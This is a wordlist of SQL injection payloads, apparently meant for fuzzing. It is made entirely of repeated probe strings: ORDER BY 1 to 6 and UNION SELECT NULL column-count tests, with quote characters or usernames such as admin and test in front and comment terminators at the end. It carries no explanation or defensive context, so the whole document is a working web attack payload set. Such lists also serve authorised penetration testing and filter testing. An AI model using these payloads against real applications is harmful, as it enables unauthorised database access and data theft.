" ORDER BY 1/*
" ORDER BY 1--
" ORDER BY 1-- -;
" ORDER BY 1-- -
" ORDER BY 1#
" ORDER BY 1;
" ORDER BY 1;#
" ORDER BY 1/*
" ORDER BY 1--
" ORDER BY 1-- -;
" ORDER BY 1-- -
" ORDER BY 1#
" ORDER BY 1;
" ORDER BY 1;#
" ORDER BY 1/*
user" ORDER BY 1--
user" ORDER BY 1-- -;
user" ORDER BY 1-- -
user" ORDER BY 1#
user" ORDER BY 1;
user" ORDER BY 1;#
user" ORDER BY 1/*
admin" ORDER BY 1--
admin" ORDER BY 1-- -;
admin" ORDER BY 1-- -
admin" ORDER BY 1#
admin" ORDER BY 1;
admin" ORDER BY 1;#
admin" ORDER BY 1/*
adam" ORDER BY 1--
adam" ORDER BY 1-- -;
adam" ORDER BY 1-- -
adam" ORDER BY 1#
adam" ORDER BY 1;
adam" ORDER BY 1;#
adam" ORDER BY 1/*
test" ORDER BY 1--
test" ORDER BY 1-- -;
test" ORDER BY 1-- -
test" ORDER BY 1#
test" ORDER BY 1;
test" ORDER BY 1;#
test" ORDER BY 1/*
user' ORDER BY 1--
user' ORDER BY 1-- -;
user' ORDER BY 1-- -
user' ORDER BY 1#
user' ORDER BY 1;
user' ORDER BY 1;#
user' ORDER BY 1/*
admin' ORDER BY 1--
admin' ORDER BY 1-- -;
admin' ORDER BY 1-- -
admin' ORDER BY 1#
admin' ORDER BY 1;
admin' ORDER BY 1;#
admin' ORDER BY 1/*
adam' ORDER BY 1--
adam' ORDER BY 1-- -;
adam' ORDER BY 1-- -
adam' ORDER BY 1#
adam' ORDER BY 1;
adam' ORDER BY 1;#
adam' ORDER BY 1/*
test' ORDER BY 1--
test' ORDER BY 1-- -;
test' ORDER BY 1-- -
test' ORDER BY 1#
test' ORDER BY 1;
test' ORDER BY 1;#
test' ORDER BY 1/*
user ORDER BY 1--
user ORDER BY 1-- -;
user ORDER BY 1-- -
user ORDER BY 1#
user ORDER BY 1;
user ORDER BY 1;#
user ORDER BY 1/*
admin ORDER BY 1--
admin ORDER BY 1-- -;
admin ORDER BY 1-- -
admin ORDER BY 1#
admin ORDER BY 1;
admin ORDER BY 1;#
admin ORDER BY 1/*
adam ORDER BY 1--
adam ORDER BY 1-- -;
adam ORDER BY 1-- -
adam ORDER BY 1#
adam ORDER BY 1;
adam ORDER BY 1;#
adam ORDER BY 1/*
test ORDER BY 1--
test ORDER BY 1-- -;
test ORDER BY 1-- -
test ORDER BY 1#
test ORDER BY 1;
test ORDER BY 1;#
test ORDER BY 1/*
 ORDER BY 2--
 ORDER BY 2-- -;
 ORDER BY 2-- -
 ORDER BY 2#
 ORDER BY 2;
 ORDER BY 2;#
 ORDER BY 2/*
 ORDER BY 2--
 ORDER BY 2-- -;
 ORDER BY 2-- -
 ORDER BY 2#
 ORDER BY 2;
 ORDER BY 2;#
 ORDER BY 2/*
 ORDER BY 2--
 ORDER BY 2-- -;
 ORDER BY 2-- -
 ORDER BY 2#
 ORDER BY 2;
 ORDER BY 2;#
 ORDER BY 2/*
 ORDER BY 2--
 ORDER BY 2-- -;
 ORDER BY 2-- -
 ORDER BY 2#
 ORDER BY 2;
 ORDER BY 2;#
 ORDER BY 2/*
' ORDER BY 2--
' ORDER BY 2-- -;
' ORDER BY 2-- -
' ORDER BY 2#
' ORDER BY 2;
' ORDER BY 2;#
' ORDER BY 2/*
' ORDER BY 2--
' ORDER BY 2-- -;
' ORDER BY 2-- -
' ORDER BY 2#
' ORDER BY 2;
' ORDER BY 2;#
' ORDER BY 2/*
' ORDER BY 2--
' ORDER BY 2-- -;
' ORDER BY 2-- -
' ORDER BY 2#
' ORDER BY 2;
' ORDER BY 2;#
' ORDER BY 2/*
' ORDER BY 2--
' ORDER BY 2-- -;
' ORDER BY 2-- -
' ORDER BY 2#
' ORDER BY 2;
' ORDER BY 2;#
' ORDER BY 2/*
" ORDER BY 2--
" ORDER BY 2-- -;
" ORDER BY 2-- -
" ORDER BY 2#
" ORDER BY 2;
" ORDER BY 2;#
" ORDER BY 2/*
" ORDER BY 2--
" ORDER BY 2-- -;
" ORDER BY 2-- -
" ORDER BY 2#
" ORDER BY 2;
" ORDER BY 2;#
" ORDER BY 2/*
" ORDER BY 2--
" ORDER BY 2-- -;
" ORDER BY 2-- -
" ORDER BY 2#
" ORDER BY 2;
" ORDER BY 2;#
" ORDER BY 2/*
" ORDER BY 2--
" ORDER BY 2-- -;
" ORDER BY 2-- -
" ORDER BY 2#
" ORDER BY 2;
" ORDER BY 2;#
" ORDER BY 2/*
user" ORDER BY 2--
user" ORDER BY 2-- -;
user" ORDER BY 2-- -
user" ORDER BY 2#
user" ORDER BY 2;
user" ORDER BY 2;#
user" ORDER BY 2/*
admin" ORDER BY 2--
admin" ORDER BY 2-- -;
admin" ORDER BY 2-- -
admin" ORDER BY 2#
admin" ORDER BY 2;
admin" ORDER BY 2;#
admin" ORDER BY 2/*
adam" ORDER BY 2--
adam" ORDER BY 2-- -;
adam" ORDER BY 2-- -
adam" ORDER BY 2#
adam" ORDER BY 2;
adam" ORDER BY 2;#
adam" ORDER BY 2/*
test" ORDER BY 2--
test" ORDER BY 2-- -;
test" ORDER BY 2-- -
test" ORDER BY 2#
test" ORDER BY 2;
test" ORDER BY 2;#
test" ORDER BY 2/*
user' ORDER BY 2--
user' ORDER BY 2-- -;
user' ORDER BY 2-- -
user' ORDER BY 2#
user' ORDER BY 2;
user' ORDER BY 2;#
user' ORDER BY 2/*
admin' ORDER BY 2--
admin' ORDER BY 2-- -;
admin' ORDER BY 2-- -
admin' ORDER BY 2#
admin' ORDER BY 2;
admin' ORDER BY 2;#
admin' ORDER BY 2/*
adam' ORDER BY 2--
adam' ORDER BY 2-- -;
adam' ORDER BY 2-- -
adam' ORDER BY 2#
adam' ORDER BY 2;
adam' ORDER BY 2;#
adam' ORDER BY 2/*
test' ORDER BY 2--
test' ORDER BY 2-- -;
test' ORDER BY 2-- -
test' ORDER BY 2#
test' ORDER BY 2;
test' ORDER BY 2;#
test' ORDER BY 2/*
user ORDER BY 2--
user ORDER BY 2-- -;
user ORDER BY 2-- -
user ORDER BY 2#
user ORDER BY 2;
user ORDER BY 2;#
user ORDER BY 2/*
admin ORDER BY 2--
admin ORDER BY 2-- -;
admin ORDER BY 2-- -
admin ORDER BY 2#
admin ORDER BY 2;
admin ORDER BY 2;#
admin ORDER BY 2/*
adam ORDER BY 2--
adam ORDER BY 2-- -;
adam ORDER BY 2-- -
adam ORDER BY 2#
adam ORDER BY 2;
adam ORDER BY 2;#
adam ORDER BY 2/*
test ORDER BY 2--
test ORDER BY 2-- -;
test ORDER BY 2-- -
test ORDER BY 2#
test ORDER BY 2;
test ORDER BY 2;#
test ORDER BY 2/*
 ORDER BY 3--
 ORDER BY 3-- -;
 ORDER BY 3-- -
 ORDER BY 3#
 ORDER BY 3;
 ORDER BY 3;#
 ORDER BY 3/*
 ORDER BY 3--
 ORDER BY 3-- -;
 ORDER BY 3-- -
 ORDER BY 3#
 ORDER BY 3;
 ORDER BY 3;#
 ORDER BY 3/*
 ORDER BY 3--
 ORDER BY 3-- -;
 ORDER BY 3-- -
 ORDER BY 3#
 ORDER BY 3;
 ORDER BY 3;#
 ORDER BY 3/*
 ORDER BY 3--
 ORDER BY 3-- -;
 ORDER BY 3-- -
 ORDER BY 3#
 ORDER BY 3;
 ORDER BY 3;#
 ORDER BY 3/*
' ORDER BY 3--
' ORDER BY 3-- -;
' ORDER BY 3-- -
' ORDER BY 3#
' ORDER BY 3;
' ORDER BY 3;#
' ORDER BY 3/*
' ORDER BY 3--
' ORDER BY 3-- -;
' ORDER BY 3-- -
' ORDER BY 3#
' ORDER BY 3;
' ORDER BY 3;#
' ORDER BY 3/*
' ORDER BY 3--
' ORDER BY 3-- -;
' ORDER BY 3-- -
' ORDER BY 3#
' ORDER BY 3;
' ORDER BY 3;#
' ORDER BY 3/*
' ORDER BY 3--
' ORDER BY 3-- -;
' ORDER BY 3-- -
' ORDER BY 3#
' ORDER BY 3;
' ORDER BY 3;#
' ORDER BY 3/*
" ORDER BY 3--
" ORDER BY 3-- -;
" ORDER BY 3-- -
" ORDER BY 3#
" ORDER BY 3;
" ORDER BY 3;#
" ORDER BY 3/*
" ORDER BY 3--
" ORDER BY 3-- -;
" ORDER BY 3-- -
" ORDER BY 3#
" ORDER BY 3;
" ORDER BY 3;#
" ORDER BY 3/*
" ORDER BY 3--
" ORDER BY 3-- -;
" ORDER BY 3-- -
" ORDER BY 3#
" ORDER BY 3;
" ORDER BY 3;#
" ORDER BY 3/*
" ORDER BY 3--
" ORDER BY 3-- -;
" ORDER BY 3-- -
" ORDER BY 3#
" ORDER BY 3;
" ORDER BY 3;#
" ORDER BY 3/*
user" ORDER BY 3--
user" ORDER BY 3-- -;
user" ORDER BY 3-- -
user" ORDER BY 3#
user" ORDER BY 3;
user" ORDER BY 3;#
user" ORDER BY 3/*
admin" ORDER BY 3--
admin" ORDER BY 3-- -;
admin" ORDER BY 3-- -
admin" ORDER BY 3#
admin" ORDER BY 3;
admin" ORDER BY 3;#
admin" ORDER BY 3/*
adam" ORDER BY 3--
adam" ORDER BY 3-- -;
adam" ORDER BY 3-- -
adam" ORDER BY 3#
adam" ORDER BY 3;
adam" ORDER BY 3;#
adam" ORDER BY 3/*
test" ORDER BY 3--
test" ORDER BY 3-- -;
test" ORDER BY 3-- -
test" ORDER BY 3#
test" ORDER BY 3;
test" ORDER BY 3;#
test" ORDER BY 3/*
user' ORDER BY 3--
user' ORDER BY 3-- -;
user' ORDER BY 3-- -
user' ORDER BY 3#
user' ORDER BY 3;
user' ORDER BY 3;#
user' ORDER BY 3/*
admin' ORDER BY 3--
admin' ORDER BY 3-- -;
admin' ORDER BY 3-- -
admin' ORDER BY 3#
admin' ORDER BY 3;
admin' ORDER BY 3;#
admin' ORDER BY 3/*
adam' ORDER BY 3--
adam' ORDER BY 3-- -;
adam' ORDER BY 3-- -
adam' ORDER BY 3#
adam' ORDER BY 3;
adam' ORDER BY 3;#
adam' ORDER BY 3/*
test' ORDER BY 3--
test' ORDER BY 3-- -;
test' ORDER BY 3-- -
test' ORDER BY 3#
test' ORDER BY 3;
test' ORDER BY 3;#
test' ORDER BY 3/*
user ORDER BY 3--
user ORDER BY 3-- -;
user ORDER BY 3-- -
user ORDER BY 3#
user ORDER BY 3;
user ORDER BY 3;#
user ORDER BY 3/*
admin ORDER BY 3--
admin ORDER BY 3-- -;
admin ORDER BY 3-- -
admin ORDER BY 3#
admin ORDER BY 3;
admin ORDER BY 3;#
admin ORDER BY 3/*
adam ORDER BY 3--
adam ORDER BY 3-- -;
adam ORDER BY 3-- -
adam ORDER BY 3#
adam ORDER BY 3;
adam ORDER BY 3;#
adam ORDER BY 3/*
test ORDER BY 3--
test ORDER BY 3-- -;
test ORDER BY 3-- -
test ORDER BY 3#
test ORDER BY 3;
test ORDER BY 3;#
test ORDER BY 3/*
 ORDER BY 4--
 ORDER BY 4-- -;
 ORDER BY 4-- -
 ORDER BY 4#
 ORDER BY 4;
 ORDER BY 4;#
 ORDER BY 4/*
 ORDER BY 4--
 ORDER BY 4-- -;
 ORDER BY 4-- -
 ORDER BY 4#
 ORDER BY 4;
 ORDER BY 4;#
 ORDER BY 4/*
 ORDER BY 4--
 ORDER BY 4-- -;
 ORDER BY 4-- -
 ORDER BY 4#
 ORDER BY 4;
 ORDER BY 4;#
 ORDER BY 4/*
 ORDER BY 4--
 ORDER BY 4-- -;
 ORDER BY 4-- -
 ORDER BY 4#
 ORDER BY 4;
 ORDER BY 4;#
 ORDER BY 4/*
' ORDER BY 4--
' ORDER BY 4-- -;
' ORDER BY 4-- -
' ORDER BY 4#
' ORDER BY 4;
' ORDER BY 4;#
' ORDER BY 4/*
' ORDER BY 4--
' ORDER BY 4-- -;
' ORDER BY 4-- -
' ORDER BY 4#
' ORDER BY 4;
' ORDER BY 4;#
' ORDER BY 4/*
' ORDER BY 4--
' ORDER BY 4-- -;
' ORDER BY 4-- -
' ORDER BY 4#
' ORDER BY 4;
' ORDER BY 4;#
' ORDER BY 4/*
' ORDER BY 4--
' ORDER BY 4-- -;
' ORDER BY 4-- -
' ORDER BY 4#
' ORDER BY 4;
' ORDER BY 4;#
' ORDER BY 4/*
" ORDER BY 4--
" ORDER BY 4-- -;
" ORDER BY 4-- -
" ORDER BY 4#
" ORDER BY 4;
" ORDER BY 4;#
" ORDER BY 4/*
" ORDER BY 4--
" ORDER BY 4-- -;
" ORDER BY 4-- -
" ORDER BY 4#
" ORDER BY 4;
" ORDER BY 4;#
" ORDER BY 4/*
" ORDER BY 4--
" ORDER BY 4-- -;
" ORDER BY 4-- -
" ORDER BY 4#
" ORDER BY 4;
" ORDER BY 4;#
" ORDER BY 4/*
" ORDER BY 4--
" ORDER BY 4-- -;
" ORDER BY 4-- -
" ORDER BY 4#
" ORDER BY 4;
" ORDER BY 4;#
" ORDER BY 4/*
user" ORDER BY 4--
user" ORDER BY 4-- -;
user" ORDER BY 4-- -
user" ORDER BY 4#
user" ORDER BY 4;
user" ORDER BY 4;#
user" ORDER BY 4/*
admin" ORDER BY 4--
admin" ORDER BY 4-- -;
admin" ORDER BY 4-- -
admin" ORDER BY 4#
admin" ORDER BY 4;
admin" ORDER BY 4;#
admin" ORDER BY 4/*
adam" ORDER BY 4--
adam" ORDER BY 4-- -;
adam" ORDER BY 4-- -
adam" ORDER BY 4#
adam" ORDER BY 4;
adam" ORDER BY 4;#
adam" ORDER BY 4/*
test" ORDER BY 4--
test" ORDER BY 4-- -;
test" ORDER BY 4-- -
test" ORDER BY 4#
test" ORDER BY 4;
test" ORDER BY 4;#
test" ORDER BY 4/*
user' ORDER BY 4--
user' ORDER BY 4-- -;
user' ORDER BY 4-- -
user' ORDER BY 4#
user' ORDER BY 4;
user' ORDER BY 4;#
user' ORDER BY 4/*
admin' ORDER BY 4--
admin' ORDER BY 4-- -;
admin' ORDER BY 4-- -
admin' ORDER BY 4#
admin' ORDER BY 4;
admin' ORDER BY 4;#
admin' ORDER BY 4/*
adam' ORDER BY 4--
adam' ORDER BY 4-- -;
adam' ORDER BY 4-- -
adam' ORDER BY 4#
adam' ORDER BY 4;
adam' ORDER BY 4;#
adam' ORDER BY 4/*
test' ORDER BY 4--
test' ORDER BY 4-- -;
test' ORDER BY 4-- -
test' ORDER BY 4#
test' ORDER BY 4;
test' ORDER BY 4;#
test' ORDER BY 4/*
user ORDER BY 4--
user ORDER BY 4-- -;
user ORDER BY 4-- -
user ORDER BY 4#
user ORDER BY 4;
user ORDER BY 4;#
user ORDER BY 4/*
admin ORDER BY 4--
admin ORDER BY 4-- -;
admin ORDER BY 4-- -
admin ORDER BY 4#
admin ORDER BY 4;
admin ORDER BY 4;#
admin ORDER BY 4/*
adam ORDER BY 4--
adam ORDER BY 4-- -;
adam ORDER BY 4-- -
adam ORDER BY 4#
adam ORDER BY 4;
adam ORDER BY 4;#
adam ORDER BY 4/*
test ORDER BY 4--
test ORDER BY 4-- -;
test ORDER BY 4-- -
test ORDER BY 4#
test ORDER BY 4;
test ORDER BY 4;#
test ORDER BY 4/*
 ORDER BY 5--
 ORDER BY 5-- -;
 ORDER BY 5-- -
 ORDER BY 5#
 ORDER BY 5;
 ORDER BY 5;#
 ORDER BY 5/*
 ORDER BY 5--
 ORDER BY 5-- -;
 ORDER BY 5-- -
 ORDER BY 5#
 ORDER BY 5;
 ORDER BY 5;#
 ORDER BY 5/*
 ORDER BY 5--
 ORDER BY 5-- -;
 ORDER BY 5-- -
 ORDER BY 5#
 ORDER BY 5;
 ORDER BY 5;#
 ORDER BY 5/*
 ORDER BY 5--
 ORDER BY 5-- -;
 ORDER BY 5-- -
 ORDER BY 5#
 ORDER BY 5;
 ORDER BY 5;#
 ORDER BY 5/*
' ORDER BY 5--
' ORDER BY 5-- -;
' ORDER BY 5-- -
' ORDER BY 5#
' ORDER BY 5;
' ORDER BY 5;#
' ORDER BY 5/*
' ORDER BY 5--
' ORDER BY 5-- -;
' ORDER BY 5-- -
' ORDER BY 5#
' ORDER BY 5;
' ORDER BY 5;#
' ORDER BY 5/*
' ORDER BY 5--
' ORDER BY 5-- -;
' ORDER BY 5-- -
' ORDER BY 5#
' ORDER BY 5;
' ORDER BY 5;#
' ORDER BY 5/*
' ORDER BY 5--
' ORDER BY 5-- -;
' ORDER BY 5-- -
' ORDER BY 5#
' ORDER BY 5;
' ORDER BY 5;#
' ORDER BY 5/*
" ORDER BY 5--
" ORDER BY 5-- -;
" ORDER BY 5-- -
" ORDER BY 5#
" ORDER BY 5;
" ORDER BY 5;#
" ORDER BY 5/*
" ORDER BY 5--
" ORDER BY 5-- -;
" ORDER BY 5-- -
" ORDER BY 5#
" ORDER BY 5;
" ORDER BY 5;#
" ORDER BY 5/*
" ORDER BY 5--
" ORDER BY 5-- -;
" ORDER BY 5-- -
" ORDER BY 5#
" ORDER BY 5;
" ORDER BY 5;#
" ORDER BY 5/*
" ORDER BY 5--
" ORDER BY 5-- -;
" ORDER BY 5-- -
" ORDER BY 5#
" ORDER BY 5;
" ORDER BY 5;#
" ORDER BY 5/*
user" ORDER BY 5--
user" ORDER BY 5-- -;
user" ORDER BY 5-- -
user" ORDER BY 5#
user" ORDER BY 5;
user" ORDER BY 5;#
user" ORDER BY 5/*
admin" ORDER BY 5--
admin" ORDER BY 5-- -;
admin" ORDER BY 5-- -
admin" ORDER BY 5#
admin" ORDER BY 5;
admin" ORDER BY 5;#
admin" ORDER BY 5/*
adam" ORDER BY 5--
adam" ORDER BY 5-- -;
adam" ORDER BY 5-- -
adam" ORDER BY 5#
adam" ORDER BY 5;
adam" ORDER BY 5;#
adam" ORDER BY 5/*
test" ORDER BY 5--
test" ORDER BY 5-- -;
test" ORDER BY 5-- -
test" ORDER BY 5#
test" ORDER BY 5;
test" ORDER BY 5;#
test" ORDER BY 5/*
user' ORDER BY 5--
user' ORDER BY 5-- -;
user' ORDER BY 5-- -
user' ORDER BY 5#
user' ORDER BY 5;
user' ORDER BY 5;#
user' ORDER BY 5/*
admin' ORDER BY 5--
admin' ORDER BY 5-- -;
admin' ORDER BY 5-- -
admin' ORDER BY 5#
admin' ORDER BY 5;
admin' ORDER BY 5;#
admin' ORDER BY 5/*
adam' ORDER BY 5--
adam' ORDER BY 5-- -;
adam' ORDER BY 5-- -
adam' ORDER BY 5#
adam' ORDER BY 5;
adam' ORDER BY 5;#
adam' ORDER BY 5/*
test' ORDER BY 5--
test' ORDER BY 5-- -;
test' ORDER BY 5-- -
test' ORDER BY 5#
test' ORDER BY 5;
test' ORDER BY 5;#
test' ORDER BY 5/*
user ORDER BY 5--
user ORDER BY 5-- -;
user ORDER BY 5-- -
user ORDER BY 5#
user ORDER BY 5;
user ORDER BY 5;#
user ORDER BY 5/*
admin ORDER BY 5--
admin ORDER BY 5-- -;
admin ORDER BY 5-- -
admin ORDER BY 5#
admin ORDER BY 5;
admin ORDER BY 5;#
admin ORDER BY 5/*
adam ORDER BY 5--
adam ORDER BY 5-- -;
adam ORDER BY 5-- -
adam ORDER BY 5#
adam ORDER BY 5;
adam ORDER BY 5;#
adam ORDER BY 5/*
test ORDER BY 5--
test ORDER BY 5-- -;
test ORDER BY 5-- -
test ORDER BY 5#
test ORDER BY 5;
test ORDER BY 5;#
test ORDER BY 5/*
 ORDER BY 6--
 ORDER BY 6-- -;
 ORDER BY 6-- -
 ORDER BY 6#
 ORDER BY 6;
 ORDER BY 6;#
 ORDER BY 6/*
 ORDER BY 6--
 ORDER BY 6-- -;
 ORDER BY 6-- -
 ORDER BY 6#
 ORDER BY 6;
 ORDER BY 6;#
 ORDER BY 6/*
 ORDER BY 6--
 ORDER BY 6-- -;
 ORDER BY 6-- -
 ORDER BY 6#
 ORDER BY 6;
 ORDER BY 6;#
 ORDER BY 6/*
 ORDER BY 6--
 ORDER BY 6-- -;
 ORDER BY 6-- -
 ORDER BY 6#
 ORDER BY 6;
 ORDER BY 6;#
 ORDER BY 6/*
' ORDER BY 6--
' ORDER BY 6-- -;
' ORDER BY 6-- -
' ORDER BY 6#
' ORDER BY 6;
' ORDER BY 6;#
' ORDER BY 6/*
' ORDER BY 6--
' ORDER BY 6-- -;
' ORDER BY 6-- -
' ORDER BY 6#
' ORDER BY 6;
' ORDER BY 6;#
' ORDER BY 6/*
' ORDER BY 6--
' ORDER BY 6-- -;
' ORDER BY 6-- -
' ORDER BY 6#
' ORDER BY 6;
' ORDER BY 6;#
' ORDER BY 6/*
' ORDER BY 6--
' ORDER BY 6-- -;
' ORDER BY 6-- -
' ORDER BY 6#
' ORDER BY 6;
' ORDER BY 6;#
' ORDER BY 6/*
" ORDER BY 6--
" ORDER BY 6-- -;
" ORDER BY 6-- -
" ORDER BY 6#
" ORDER BY 6;
" ORDER BY 6;#
" ORDER BY 6/*
" ORDER BY 6--
" ORDER BY 6-- -;
" ORDER BY 6-- -
" ORDER BY 6#
" ORDER BY 6;
" ORDER BY 6;#
" ORDER BY 6/*
" ORDER BY 6--
" ORDER BY 6-- -;
" ORDER BY 6-- -
" ORDER BY 6#
" ORDER BY 6;
" ORDER BY 6;#
" ORDER BY 6/*
" ORDER BY 6--
" ORDER BY 6-- -;
" ORDER BY 6-- -
" ORDER BY 6#
" ORDER BY 6;
" ORDER BY 6;#
" ORDER BY 6/*
user" ORDER BY 6--
user" ORDER BY 6-- -;
user" ORDER BY 6-- -
user" ORDER BY 6#
user" ORDER BY 6;
user" ORDER BY 6;#
user" ORDER BY 6/*
admin" ORDER BY 6--
admin" ORDER BY 6-- -;
admin" ORDER BY 6-- -
admin" ORDER BY 6#
admin" ORDER BY 6;
admin" ORDER BY 6;#
admin" ORDER BY 6/*
adam" ORDER BY 6--
adam" ORDER BY 6-- -;
adam" ORDER BY 6-- -
adam" ORDER BY 6#
adam" ORDER BY 6;
adam" ORDER BY 6;#
adam" ORDER BY 6/*
test" ORDER BY 6--
test" ORDER BY 6-- -;
test" ORDER BY 6-- -
test" ORDER BY 6#
test" ORDER BY 6;
test" ORDER BY 6;#
test" ORDER BY 6/*
user' ORDER BY 6--
user' ORDER BY 6-- -;
user' ORDER BY 6-- -
user' ORDER BY 6#
user' ORDER BY 6;
user' ORDER BY 6;#
user' ORDER BY 6/*
admin' ORDER BY 6--
admin' ORDER BY 6-- -;
admin' ORDER BY 6-- -
admin' ORDER BY 6#
admin' ORDER BY 6;
admin' ORDER BY 6;#
admin' ORDER BY 6/*
adam' ORDER BY 6--
adam' ORDER BY 6-- -;
adam' ORDER BY 6-- -
adam' ORDER BY 6#
adam' ORDER BY 6;
adam' ORDER BY 6;#
adam' ORDER BY 6/*
test' ORDER BY 6--
test' ORDER BY 6-- -;
test' ORDER BY 6-- -
test' ORDER BY 6#
test' ORDER BY 6;
test' ORDER BY 6;#
test' ORDER BY 6/*
user ORDER BY 6--
user ORDER BY 6-- -;
user ORDER BY 6-- -
user ORDER BY 6#
user ORDER BY 6;
user ORDER BY 6;#
user ORDER BY 6/*
admin ORDER BY 6--
admin ORDER BY 6-- -;
admin ORDER BY 6-- -
admin ORDER BY 6#
admin ORDER BY 6;
admin ORDER BY 6;#
admin ORDER BY 6/*
adam ORDER BY 6--
adam ORDER BY 6-- -;
adam ORDER BY 6-- -
adam ORDER BY 6#
adam ORDER BY 6;
adam ORDER BY 6;#
adam ORDER BY 6/*
test ORDER BY 6--
test ORDER BY 6-- -;
test ORDER BY 6-- -
test ORDER BY 6#
test ORDER BY 6;
test ORDER BY 6;#
test ORDER BY 6/*
 UNION SELECT NULL--
 UNION SELECT NULL-- -;
 UNION SELECT NULL-- -
 UNION SELECT NULL#
 UNION SELECT NULL;
 UNION SELECT NULL;#
 UNION SELECT NULL/*
 UNION SELECT NULL--
 UNION SELECT NULL-- -;
 UNION SELECT NULL-- -
 UNION SELECT NULL#
 UNION SELECT NULL;
 UNION SELECT NULL;#
 UNION SELECT NULL/*
 UNION SELECT NULL--
 UNION SELECT NULL-- -;
 UNION SELECT NULL-- -
 UNION SELECT NULL#
 UNION SELECT NULL;
 UNION SELECT NULL;#
 UNION SELECT NULL/*
 UNION SELECT NULL--
 UNION SELECT NULL-- -;
 UNION SELECT NULL-- -
 UNION SELECT NULL#
 UNION SELECT NULL;
 UNION SELECT NULL;#
 UNION SELECT NULL/*
' UNION SELECT NULL--
' UNION SELECT NULL-- -;
' UNION SELECT NULL-- -
' UNION SELECT NULL#
' UNION SELECT NULL;
' UNION SELECT NULL;#
' UNION SELECT NULL/*
' UNION SELECT NULL--
' UNION SELECT NULL-- -;
' UNION SELECT NULL-- -
' UNION SELECT NULL#
' UNION SELECT NULL;
' UNION SELECT NULL;#
' UNION SELECT NULL/*
' UNION SELECT NULL--
' UNION SELECT NULL-- -;
' UNION SELECT NULL-- -
' UNION SELECT NULL#
' UNION SELECT NULL;
' UNION SELECT NULL;#
' UNION SELECT NULL/*
' UNION SELECT NULL--
' UNION SELECT NULL-- -;
' UNION SELECT NULL-- -
' UNION SELECT NULL#
' UNION SELECT NULL;
' UNION SELECT NULL;#
' UNION SELECT NULL/*
" UNION SELECT NULL--
" UNION SELECT NULL-- -;
" UNION SELECT NULL-- -
" UNION SELECT NULL#
" UNION SELECT NULL;
" UNION SELECT NULL;#
" UNION SELECT NULL/*
" UNION SELECT NULL--
" UNION SELECT NULL-- -;
" UNION SELECT NULL-- -
" UNION SELECT NULL#
" UNION SELECT NULL;
" UNION SELECT NULL;#
" UNION SELECT NULL/*
" UNION SELECT NULL--
" UNION SELECT NULL-- -;
" UNION SELECT NULL-- -
" UNION SELECT NULL#
" UNION SELECT NULL;
" UNION SELECT NULL;#
" UNION SELECT NULL/*
" UNION SELECT NULL--
" UNION SELECT NULL-- -;
" UNION SELECT NULL-- -
" UNION SELECT NULL#
" UNION SELECT NULL;
" UNION SELECT NULL;#
" UNION SELECT NULL/*
user" UNION SELECT NULL--
user" UNION SELECT NULL-- -;
user" UNION SELECT NULL-- -
user" UNION SELECT NULL#
user" UNION SELECT NULL;
user" UNION SELECT NULL;#
user" UNION SELECT NULL/*
admin" UNION SELECT NULL--
admin" UNION SELECT NULL-- -;
admin" UNION SELECT NULL-- -
admin" UNION SELECT NULL#
admin" UNION SELECT NULL;
admin" UNION SELECT NULL;#
admin" UNION SELECT NULL/*
adam" UNION SELECT NULL--
adam" UNION SELECT NULL-- -;
adam" UNION SELECT NULL-- -
adam" UNION SELECT NULL#
adam" UNION SELECT NULL;
adam" UNION SELECT NULL;#
adam" UNION SELECT NULL/*
test" UNION SELECT NULL--
test" UNION SELECT NULL-- -;
test" UNION SELECT NULL-- -
test" UNION SELECT NULL#
test" UNION SELECT NULL;
test" UNION SELECT NULL;#
test" UNION SELECT NULL/*
user' UNION SELECT NULL--
user' UNION SELECT NULL-- -;
user' UNION SELECT NULL-- -
user' UNION SELECT NULL#
user' UNION SELECT NULL;
user' UNION SELECT NULL;#
user' UNION SELECT NULL/*
admin' UNION SELECT NULL--
admin' UNION SELECT NULL-- -;
admin' UNION SELECT NULL-- -
admin' UNION SELECT NULL#
admin' UNION SELECT NULL;
admin' UNION SELECT NULL;#
admin' UNION SELECT NULL/*
adam' UNION SELECT NULL--
adam' UNION SELECT NULL-- -;
adam' UNION SELECT NULL-- -
adam' UNION SELECT NULL#
adam' UNION SELECT NULL;
adam' UNION SELECT NULL;#
adam' UNION SELECT NULL/*
test' UNION SELECT NULL--
test' UNION SELECT NULL-- -;
test' UNION SELECT NULL-- -
test' UNION SELECT NULL#
test' UNION SELECT NULL;
test' UNION SELECT NULL;#
test' UNION SELECT NULL/*
user UNION SELECT NULL--
user UNION SELECT NULL-- -;
user UNION SELECT NULL-- -
user UNION SELECT NULL#
user UNION SELECT NULL;
user UNION SELECT NULL;#
user UNION SELECT NULL/*
admin UNION SELECT NULL--
admin UNION SELECT NULL-- -;
admin UNION SELECT NULL-- -
admin UNION SELECT NULL#
admin UNION SELECT NULL;
admin UNION SELECT NULL;#
admin UNION SELECT NULL/*
adam UNION SELECT NULL--
adam UNION SELECT NULL-- -;
adam UNION SELECT NULL-- -
adam UNION SELECT NULL#
adam UNION SELECT NULL;
adam UNION SELECT NULL;#
adam UNION SELECT NULL/*
test UNION SELECT NULL--
test UNION SELECT NULL-- -;
test UNION SELECT NULL-- -
test UNION SELECT NULL#
test UNION SELECT NULL;
test UNION SELECT NULL;#
test UNION SELECT NULL/*
 UNION SELECT NULL,NULL--
 UNION SELECT NULL,NULL-- -;
 UNION SELECT NULL,NULL-- -
 UNION SELECT NULL,NULL#
 UNION SELECT NULL,NULL;
 UNION SELECT NULL,NULL;#
 UNION SELECT NULL,NULL/*
 UNION SELECT NULL,NULL--
 UNION SELECT NULL,NULL-- -;
 UNION SELECT NULL,NULL-- -
 UNION SELECT NULL,NULL#
 UNION SELECT NULL,NULL;
 UNION SELECT NULL,NULL;#
 UNION SELECT NULL,NULL/*
 UNION SELECT NULL,NULL--
 UNION SELECT NULL,NULL-- -;
 UNION SELECT NULL,NULL-- -
 UNION SELECT NULL,NULL#
 UNION SELECT NULL,NULL;
 UNION SELECT NULL,NULL;#
 UNION SELECT NULL,NULL/*
 UNION SELECT NULL,NULL--
 UNION SELECT NULL,NULL-- -;
 UNION SELECT NULL,NULL-- -
 UNION SELECT NULL,NULL#
 UNION SELECT NULL,NULL;
 UNION SELECT NULL,NULL;#
 UNION SELECT NULL,NULL/*
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL-- -;
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL#
' UNION SELECT NULL,NULL;
' UNION SELECT NULL,NULL;#
' UNION SELECT NULL,NULL/*
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL-- -;
' UNION SELECT NULL,NULL-- -
